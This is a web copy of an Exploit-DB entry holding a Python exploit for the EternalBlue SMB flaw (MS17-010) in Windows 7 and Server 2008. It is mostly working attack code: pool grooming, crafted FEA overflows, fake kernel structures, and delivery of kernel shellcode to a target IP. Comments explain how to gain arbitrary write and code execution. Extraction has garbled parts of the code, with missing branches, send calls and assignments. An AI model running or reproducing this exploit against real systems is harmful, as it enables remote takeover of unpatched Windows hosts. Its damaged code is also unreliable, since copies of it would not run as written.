Microsoft Windows 7/2008 R2 – ‘EternalBlue’ SMB Remote Code Execution (MS17-010)

  • 作者: sleepya
    日期: 2017-05-17
  • 类别:
  • 来源:
  • #!/usr/bin/python
    from impacket import smb
    from struct import pack
    import sys
    import socket
    EternalBlue exploit for Windows 7/2008 by sleepya
    The exploit might FAIL and CRASH a target system (depended on what is overwritten)
    EDB Note: Shellcode
    - x64 ~
    - x86 ~
    Tested on:
    - Windows 7 SP1 x64
    - Windows 2008 R2 SP1 x64
    - Windows 7 SP1 x86
    - Windows 2008 SP1 x64
    - Windows 2008 SP1 x86
    Bug detail:
    - For the buffer overflow bug detail, please see
    - The exploit also use other 2 bugs (see details in BUG.txt)
    - Send a large transaction with SMB_COM_NT_TRANSACT but processed as SMB_COM_TRANSACTION2 (requires for trigger bug)
    - Send special session setup command (SMB login command) to allocate big nonpaged pool (use for creating hole)
    Exploit info:
    - I do not reverse engineer any x86 binary so I do not know about exact offset.
    - The exploit use heap of HAL (address 0xffffffffffd00010 on x64) for placing fake struct and shellcode.
    This memory page is executable on Windows 7 and Wndows 2008.
    - The important part of feaList and fakeStruct is copied from NSA exploit which works on both x86 and x64.
    - The exploit trick is same as NSA exploit
    - The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.
    - If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5)
    - See the code and comment for exploit detail.
    srvnet buffer info:
    - srvnet buffer contains a pointer to another struct and MDL about received buffer
    - Controlling MDL values results in arbitrary write
    - Controlling pointer to fake struct results in code execution because there is pointer to function
    - A srvnet buffer is created after target receiving first 4 bytes
    - First 4 bytes contains length of SMB message
    - The possible srvnet buffer size is "..., 0x9000, 0x11000, 0x21000, ...". srvnet.sys will select the size that big enough.
    - After receiving whole SMB message or connection lost, server call SrvNetWskReceiveComplete() to handle SMB message
    - SrvNetWskReceiveComplete() check and set some value then pass SMB message to SrvNetCommonReceiveHandler()
    - SrvNetCommonReceiveHandler() passes SMB message to SMB handler
    - If a pointer in srvnet buffer is modified to fake struct, we can make SrvNetCommonReceiveHandler() call our shellcode
    - If SrvNetCommonReceiveHandler() call our shellcode, no SMB handler is called
    - Normally, SMB handler free the srvnet buffer when done but our shellcode dose not. So memory leak happen.
    - Memory leak is ok to be ignored
    Shellcode note:
    - Shellcode is executed in kernel mode (ring 0) and IRQL is DISPATCH_LEVEL
    - Hijacking system call is common method for getting code execution in Process context (IRQL is PASSIVE_LEVEL)
    - On Windows x64, System call target address can be modified by writing to IA32_LSTAR MSR (0xc0000082)
    - IA32_LSTAR MSR scope is core/thread/unique depended on CPU model
    - On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to 
    get call because it is called on other processors
    - Shellcode should be aware of double overwriting system call target address when using hijacking system call method
    - Then, using APC in Process context to get code execution in userland (ring 3)
    #E-DB Note:
    #E-DB Note:
    # Note: see how to craft FEALIST in
    # wanted overflown buffer size (this exploit support only 0x10000 and 0x11000)
    # the size 0x10000 is easier to debug when setting breakpoint in SrvOs2FeaToNt() because it is called only 2 time
    # the size 0x11000 is used in nsa exploit. this size is more reliable.
    NTFEA_SIZE = 0x11000
    # the NTFEA_SIZE above is page size. We need to use most of last page preventing any data at the end of last page
    ntfea10000 = pack('<BBH', 0, 0, 0xffdd) + 'A'*0xffde
    ntfea11000 = (pack('<BBH', 0, 0, 0) + '\x00')*600# with these fea, ntfea size is 0x1c20
    ntfea11000 += pack('<BBH', 0, 0, 0xf3bd) + 'A'*0xf3be# 0x10fe8 - 0x1c20 - 0xc = 0xf3bc
    ntfea1f000 = (pack('<BBH', 0, 0, 0) + '\x00')*0x2494# with these fea, ntfea size is 0x1b6f0
    ntfea1f000 += pack('<BBH', 0, 0, 0x48ed) + 'A'*0x48ee# 0x1ffe8 - 0x1b6f0 - 0xc = 0x48ec
    ntfea = { 0x10000 : ntfea10000, 0x11000 : ntfea11000 }
    Reverse from srvnet.sys (Win7 x64)
    - SrvNetAllocateNonPagedBufferInternal() and SrvNetWskReceiveComplete():
    // for x64
    struct SRVNET_BUFFER {
    	// offset from POOLHDR: 0x10
    	USHORT flag;
    	char pad[2];
    	char unknown0[12];
    	// offset from SRVNET_POOLHDR: 0x20
    	LIST_ENTRY list;
    	// offset from SRVNET_POOLHDR: 0x30
    	char *pnetBuffer;
    	DWORD netbufSize;// size of netBuffer
    	DWORD ioStatusInfo;// copy value of IRP.IOStatus.Information
    	// offset from SRVNET_POOLHDR: 0x40
    	MDL *pMdl1; // at offset 0x70
    	DWORD nByteProcessed;
    	DWORD pad3;
    	// offset from SRVNET_POOLHDR: 0x50
    	DWORD nbssSize;// size of this smb packet (from user)
    	DWORD pad4;
    	QWORD pSrvNetWskStruct;// want to change to fake struct address
    	// offset from SRVNET_POOLHDR: 0x60
    	MDL *pMdl2;
    	QWORD unknown5;
    	// offset from SRVNET_POOLHDR: 0x70
    	// MDL mdl1;// for this srvnetBuffer (so its pointer is srvnetBuffer address)
    	// MDL mdl2;
    	// char transportHeader[0x50];// 0x50 is TRANSPORT_HEADER_SIZE
    	// char netBuffer[0];
    struct SRVNET_POOLHDR {
    	DWORD size;
    	char unknown[12];
    # Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing
    # Here is the important fields on x64
    # - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.
    # The value MUST point to valid (might be fake) struct.
    # - offset 0x70 (MDL) : MDL for describe receiving SMB request buffer
    # - 0x70 (VOID*): MDL.Next should be NULL
    # - 0x78 (USHORT) : MDL.Size should be some value that not too small
    # - 0x7a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)
    # - 0x80 (VOID*): MDL.Process should be NULL
    # - 0x88 (VOID*): MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.
    # The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).
    # To free the corrupted srvnet buffer, shellcode MUST modify some memory value to satisfy condition.
    # Here is related field for freeing corrupted buffer
    # - offset 0x10 (USHORT): be 0xffff to make SrvNetFreeBuffer() really free the buffer (else buffer is pushed to srvnet lookaside)
    # a corrupted buffer MUST not be reused.
    # - offset 0x48 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0
    # before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to
    # your shellcode as function argument
    # - offset 0x60 (PMDL): points to any fake MDL with MDL.Flags 0x20 does not set
    # The last condition is your shellcode MUST return non-negative value. The easiest way to do is "xor eax,eax" before "ret".
    # Here is x64 assembly code for setting nByteProcessed field
    # - fetch SRVNET_BUFFER address from function argument
    # \x48\x8b\x54\x24\x40mov rdx, [rsp+0x40]
    # - set nByteProcessed for trigger free after return
    # \x8b\x4a\x2cmov ecx, [rdx+0x2c]
    # \x89\x4a\x38mov [rdx+0x38], ecx
    TARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010
    TARGET_HAL_HEAP_ADDR_x86 = 0xffdff000
    fakeSrvNetBufferNsa = pack('<II', 0x11000, 0)*2
    fakeSrvNetBufferNsa += pack('<HHI', 0xffff, 0, 0)*2
    fakeSrvNetBufferNsa += '\x00'*16
    fakeSrvNetBufferNsa += pack('<IIII', TARGET_HAL_HEAP_ADDR_x86+0x100, 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x20)
    fakeSrvNetBufferNsa += pack('<IIHHI', TARGET_HAL_HEAP_ADDR_x86+0x100, 0, 0x60, 0x1004, 0)# _, x86 MDL.Next, .Size, .MdlFlags, .Process
    fakeSrvNetBufferNsa += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86-0x80, 0, TARGET_HAL_HEAP_ADDR_x64)# x86 MDL.MappedSystemVa, _, x64 pointer to fake struct
    fakeSrvNetBufferNsa += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0)# x64 pmdl2
    # below 0x20 bytes is overwritting MDL
    # NSA exploit overwrite StartVa, ByteCount, ByteOffset fields but I think no need because ByteCount is always big enough
    fakeSrvNetBufferNsa += pack('<QHHI', 0, 0x60, 0x1004, 0)# MDL.Next, MDL.Size, MDL.MdlFlags
    fakeSrvNetBufferNsa += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80)# MDL.Process, MDL.MappedSystemVa
    # below is for targeting x64 only (all x86 related values are set to 0)
    # this is for show what fields need to be modified
    fakeSrvNetBufferX64 = pack('<II', 0x11000, 0)*2
    fakeSrvNetBufferX64 += pack('<HHIQ', 0xffff, 0, 0, 0)
    fakeSrvNetBufferX64 += '\x00'*16
    fakeSrvNetBufferX64 += '\x00'*16
    fakeSrvNetBufferX64 += '\x00'*16# 0x40
    fakeSrvNetBufferX64 += pack('<IIQ', 0, 0, TARGET_HAL_HEAP_ADDR_x64)# _, _, pointer to fake struct
    fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0)# pmdl2
    fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0)# MDL.Next, MDL.Size, MDL.MdlFlags
    fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80)# MDL.Process, MDL.MappedSystemVa
    fakeSrvNetBuffer = fakeSrvNetBufferNsa
    #fakeSrvNetBuffer = fakeSrvNetBufferX64
    feaList = pack('<I', 0x10000)# the value of feaList size MUST be >=0x10000 to trigger bug (but must be less than data size)
    feaList += ntfea[NTFEA_SIZE]
    # Note:
    # - SMB1 data buffer header is 16 bytes and 8 bytes on x64 and x86 respectively
    # - x64: below fea will be copy to offset 0x11000 of overflow buffer
    # - x86: below fea will be copy to offset 0x10ff8 of overflow buffer
    feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuffer)-1) + fakeSrvNetBuffer # -1 because first '\x00' is for name
    # stop copying by invalid flag (can be any value except 0 and 0x80)
    feaList += pack('<BBH', 0x12, 0x34, 0x5678)
    # fake struct for SrvNetWskReceiveComplete() and SrvNetCommonReceiveHandler()
    # x64: fake struct is at ffffffff ffd00010
    # offset 0xa0:LIST_ENTRY must be valid address. cannot be NULL.
    # offset 0x08:set to 3 (DWORD) for invoking ptr to function
    # offset 0x1d0: KSPIN_LOCK
    # offset 0x1d8: array of pointer to function
    # code path to get code exection after this struct is controlled
    # SrvNetWskReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr
    fake_recv_struct = pack('<QII', 0, 3, 0)
    fake_recv_struct += '\x00'*16
    fake_recv_struct += pack('<QII', 0, 3, 0)
    fake_recv_struct += ('\x00'*16)*7
    fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0xa0, TARGET_HAL_HEAP_ADDR_x64+0xa0)# offset 0xa0 (LIST_ENTRY to itself)
    fake_recv_struct += '\x00'*16
    fake_recv_struct += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86+0xc0, TARGET_HAL_HEAP_ADDR_x86+0xc0, 0)# x86 LIST_ENTRY
    fake_recv_struct += ('\x00'*16)*11
    fake_recv_struct += pack('<QII', 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x190)# fn_ptr array on x86
    fake_recv_struct += pack('<IIQ', 0, TARGET_HAL_HEAP_ADDR_x86+0x1f0-1, 0)# x86 shellcode address
    fake_recv_struct += ('\x00'*16)*3
    fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1e0)# offset 0x1d0: KSPINLOCK, fn_ptr array
    fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1f0-1)# x64 shellcode address - 1 (this value will be increment by one)
    def getNTStatus(self):
    	return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']
    setattr(smb.NewSMBPacket, "getNTStatus", getNTStatus)
    def sendEcho(conn, tid, data):
    	pkt = smb.NewSMBPacket()
    	pkt['Tid'] = tid
    	transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)
    	transCommand['Parameters'] = smb.SMBEcho_Parameters()
    	transCommand['Data'] = smb.SMBEcho_Data()
    	transCommand['Parameters']['EchoCount'] = 1
    	transCommand['Data']['Data'] = data
    	recvPkt = conn.recvSMB()
    	if recvPkt.getNTStatus() == 0:
    		print('got good ECHO response')
    		print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))
    def createSessionAllocNonPaged(target, size):
    	# There is a bug in SMB_COM_SESSION_SETUP_ANDX command that allow us to allocate a big nonpaged pool.
    	# The big nonpaged pool allocation is in BlockingSessionSetupAndX() function for storing NativeOS and NativeLanMan.
    	# The NativeOS and NativeLanMan size is caculated from "ByteCount - other_data_size"
    	# Normally a server validate WordCount and ByteCount field in SrvValidateSmb() function. They must not be larger than received data. 
    	# For "NT LM 0.12" dialect, There are 2 possible packet format for SMB_COM_SESSION_SETUP_ANDX command.
    	# - for LM and NTLM authentication
    	# - GetNtSecurityParameters() function is resposible for extracting data from this packet format
    	# - for NTLMv2 (NTLM SSP) authentication
    	# - GetExtendSecurityParameters() function is resposible for extracting data from this packet format
    	# These 2 formats have different WordCount (first one is 13 and later is 12). 
    	# Here is logic in BlockingSessionSetupAndX() related to this bug
    	# - check WordCount for both formats (the CAP_EXTENDED_SECURITY must be set for extended security format)
    	# - if FLAGS2_EXTENDED_SECURITY and CAP_EXTENDED_SECURITY are set, process a message as Extend Security request
    	# - else, process a message as NT Security request
    	# So we can send one format but server processes it as another format by controlling FLAGS2_EXTENDED_SECURITY and CAP_EXTENDED_SECURITY.
    	# With this confusion, server read a ByteCount from wrong offset to calculating "NativeOS and NativeLanMan size".
    	# But GetExtendSecurityParameters() checks ByteCount value again.
    	# So the only possible request to use the bug is sending Extended Security request but does not set FLAGS2_EXTENDED_SECURITY.
    	conn = smb.SMB(target, target)
    	_, flags2 = conn.get_flags()
    	flags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY
    	# if not use unicode, buffer size on target machine is doubled because converting ascii to utf16
    	if size >= 0xffff:
    		flags2 &= ~smb.SMB.FLAGS2_UNICODE
    		reqSize = size // 2
    		flags2 |= smb.SMB.FLAGS2_UNICODE
    		reqSize = size
    	pkt = smb.NewSMBPacket()
    	sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
    	sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()
    	sessionSetup['Parameters']['MaxBufferSize']= 61440# can be any value greater than response size
    	sessionSetup['Parameters']['MaxMpxCount']= 2# can by any value
    	sessionSetup['Parameters']['VcNumber'] = 2# any non-zero
    	sessionSetup['Parameters']['SessionKey'] = 0
    	sessionSetup['Parameters']['SecurityBlobLength'] = 0# this is OEMPasswordLen field in another format. 0 for NULL session
    	# UnicodePasswordLen field is in Reserved for extended security format. 0 for NULL session
    	sessionSetup['Parameters']['Capabilities'] = smb.SMB.CAP_EXTENDED_SECURITY# can add other flags
    	sessionSetup['Data'] = pack('<H', reqSize) + '\x00'*20
    	recvPkt = conn.recvSMB()
    	if recvPkt.getNTStatus() == 0:
    		print('SMB1 session setup allocate nonpaged pool success')
    		print('SMB1 session setup allocate nonpaged pool failed')
    	return conn
    # Note: impacket-0.9.15 struct has no ParameterDisplacement
    ############# SMB_COM_TRANSACTION2_SECONDARY (0x33)
    class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):
    structure = (
    def send_trans2_second(conn, tid, data, displacement):
    	pkt = smb.NewSMBPacket()
    	pkt['Tid'] = tid
    	# assume no params
    	transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)
    	transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()
    	transCommand['Data'] = smb.SMBTransaction2Secondary_Data()
    	transCommand['Parameters']['TotalParameterCount'] = 0
    	transCommand['Parameters']['TotalDataCount'] = len(data)
    	fixedOffset = 32+3+18
    	transCommand['Data']['Pad1'] = ''
    	transCommand['Parameters']['ParameterCount'] = 0
    	transCommand['Parameters']['ParameterOffset'] = 0
    	if len(data) > 0:
    		pad2Len = (4 - fixedOffset % 4) % 4
    		transCommand['Data']['Pad2'] = '\xFF' * pad2Len
    		transCommand['Data']['Pad2'] = ''
    		pad2Len = 0
    	transCommand['Parameters']['DataCount'] = len(data)
    	transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len
    	transCommand['Parameters']['DataDisplacement'] = displacement
    	transCommand['Data']['Trans_Parameters'] = ''
    	transCommand['Data']['Trans_Data'] = data
    def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):
    	# Here is another bug in MS17-010.
    	# To call transaction subcommand, normally a client need to use correct SMB commands as documented in
    	# If a transaction message is larger than SMB message (MaxBufferSize in session parameter), a client 
    	# can use *_SECONDARY command to send transaction message. When sending a transaction completely with
    	# *_SECONDARY command, a server uses the last command that complete the transaction.
    	# For example:
    	# - if last command is SMB_COM_NT_TRANSACT_SECONDARY, a server executes subcommand as NT_TRANSACT_*.
    	# - if last command is SMB_COM_TRANSACTION2_SECONDARY, a server executes subcommand as TRANS2_*.
    	# Without MS17-010 patch, a client can mix a transaction command if TID, PID, UID, MID are the same.
    	# For example:
    	# - a client start transaction with SMB_COM_NT_TRANSACT command
    	# - a client send more transaction data with SMB_COM_NT_TRANSACT_SECONDARY and SMB_COM_TRANSACTION2_SECONDARY
    	# - a client sned last transactino data with SMB_COM_TRANSACTION2_SECONDARY
    	# - a server executes transaction subcommand as TRANS2_* (first 2 bytes of Setup field)
    	# From, a maximum data size for sending a transaction 
    	# with SMB_COM_TRANSACTION2 is 65535 because TotalDataCount field is USHORT
    	# While a maximum data size for sending a transaction with SMB_COM_NT_TRANSACT is >65536 because TotalDataCount
    	# field is ULONG (see
    	# Note: a server limit SetupCount+TotalParameterCount+TotalDataCount to 0x10400 (in SrvAllocationTransaction)
    	pkt = smb.NewSMBPacket()
    	pkt['Tid'] = tid
    	command = pack('<H', setup)
    	# Use SMB_COM_NT_TRANSACT because we need to send data >65535 bytes to trigger the bug.
    	transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)
    	transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()
    	transCommand['Parameters']['MaxSetupCount'] = 1
    	transCommand['Parameters']['MaxParameterCount'] = len(param)
    	transCommand['Parameters']['MaxDataCount'] = 0
    	transCommand['Data'] = smb.SMBTransaction2_Data()
    	transCommand['Parameters']['Setup'] = command
    	transCommand['Parameters']['TotalParameterCount'] = len(param)
    	transCommand['Parameters']['TotalDataCount'] = len(data)
    	fixedOffset = 32+3+38 + len(command)
    	if len(param) > 0:
    		padLen = (4 - fixedOffset % 4 ) % 4
    		padBytes = '\xFF' * padLen
    		transCommand['Data']['Pad1'] = padBytes
    		transCommand['Data']['Pad1'] = ''
    		padLen = 0
    	transCommand['Parameters']['ParameterCount'] = len(param)
    	transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen
    	if len(data) > 0:
    		pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4
    		transCommand['Data']['Pad2'] = '\xFF' * pad2Len
    		transCommand['Data']['Pad2'] = ''
    		pad2Len = 0
    	transCommand['Parameters']['DataCount'] = firstDataFragmentSize
    	transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len
    	transCommand['Data']['Trans_Parameters'] = param
    	transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]
    	conn.recvSMB() # must be success
    	# Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data
    	i = firstDataFragmentSize
    	while i < len(data):
    		# limit data to 4096 bytes per SMB message because this size can be used for all Windows version
    		sendSize = min(4096, len(data) - i)
    		if len(data) - i <= 4096:
    			if not sendLastChunk:
    		send_trans2_second(conn, tid, data[i:i+sendSize], i)
    		i += sendSize
    	if sendLastChunk:
    	return i
    # connect to target and send a large nbss size with data 0x80 bytes
    # this method is for allocating big nonpaged pool (no need to be same size as overflow buffer) on target
    # a nonpaged pool is allocated by srvnet.sys that started by useful struct (especially after overwritten)
    def createConnectionWithBigSMBFirst80(target):
    	# Above link is about SMB2, but the important here is first 4 bytes.
    	# If using wireshark, you will see the StreamProtocolLength is NBSS length.
    	# The first 4 bytes is same for all SMB version. It is used for determine the SMB message length.
    	# After received first 4 bytes, srvnet.sys allocate nonpaged pool for receving SMB message.
    	# srvnet.sys forwards this buffer to SMB message handler after receiving all SMB message.
    	# Note: For Windows 7 and Windows 2008, srvnet.sys also forwards the SMB message to its handler when connection lost too.
    	sk = socket.create_connection((target, 445))
    	# For this exploit, use size is 0x11000
    	pkt = '\x00' + '\x00' + pack('>H', 0xfff7)
    	# There is no need to be SMB2 because we got code execution by corrupted srvnet buffer.
    	# Also this is invalid SMB2 message.
    	# I believe NSA exploit use SMB2 for hiding alert from IDS
    	#pkt += '\xfeSMB' # smb2
    	# it can be anything even it is invalid
    	pkt += 'BAAD' # can be any
    	pkt += '\x00'*0x7c
    	return sk
    def exploit(target, shellcode, numGroomConn):
    	# force using smb.SMB for SMB1
    	conn = smb.SMB(target, target)
    	# can use conn.login() for ntlmv2
    	conn.login_standard('', '')
    	server_os = conn.get_server_os()
    	print('Target OS: '+server_os)
    	if not (server_os.startswith("Windows 7 ") or (server_os.startswith("Windows Server ") and ' 2008 ' in server_os) or server_os.startswith("Windows Vista")):
    		print('This exploit does not support this target')
    	tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
    	# The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.
    	# Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment
    	progress = send_big_trans2(conn, tid, 0, feaList, '\x00'*30, 2000, False)
    	# we have to know what size of NtFeaList will be created when last fragment is sent
    	# make sure server recv all payload before starting allocate big NonPaged
    	#sendEcho(conn, tid, 'a'*12)
    	# create buffer size NTFEA_SIZE-0x1000 at server
    	# this buffer MUST NOT be big enough for overflown buffer
    	allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010)
    	# groom nonpaged pool
    	# when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one
    	srvnetConn = []
    	for i in range(numGroomConn):
    		sk = createConnectionWithBigSMBFirst80(target)
    	# create buffer size NTFEA_SIZE at server
    	# this buffer will be replaced by overflown buffer
    	holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10)
    	# disconnect allocConn to free buffer
    	# expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer
    	# hope one of srvnetConn is next to holeConn
    	for i in range(5):
    		sk = createConnectionWithBigSMBFirst80(target)
    	# send echo again, all new 5 srvnet buffers should be created
    	#sendEcho(conn, tid, 'a'*12)
    	# remove holeConn to create hole for fea buffer
    	# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header
    	send_trans2_second(conn, tid, feaList[progress:], progress)
    	recvPkt = conn.recvSMB()
    	retStatus = recvPkt.getNTStatus()
    	# retStatus MUST be 0xc000000d (INVALID_PARAMETER) because of invalid fea flag
    	if retStatus == 0xc000000d:
    		print('good response status: INVALID_PARAMETER')
    		print('bad response status: 0x{:08x}'.format(retStatus))
    	# one of srvnetConn struct header should be modified
    	# a corrupted buffer will write recv data in designed memory address
    	for sk in srvnetConn:
    		sk.send(fake_recv_struct + shellcode)
    	# execute shellcode by closing srvnet connection
    	for sk in srvnetConn:
    	# nicely close connection (no need for exploit)
    if len(sys.argv) < 3:
    	print("{} <ip> <shellcode_file> [numGroomConn]".format(sys.argv[0]))
    numGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3])
    fp = open(sys.argv[2], 'rb')
    sc =
    print('shellcode size: {:d}'.format(len(sc)))
    print('numGroomConn: {:d}'.format(numGroomConn))
    exploit(TARGET, sc, numGroomConn)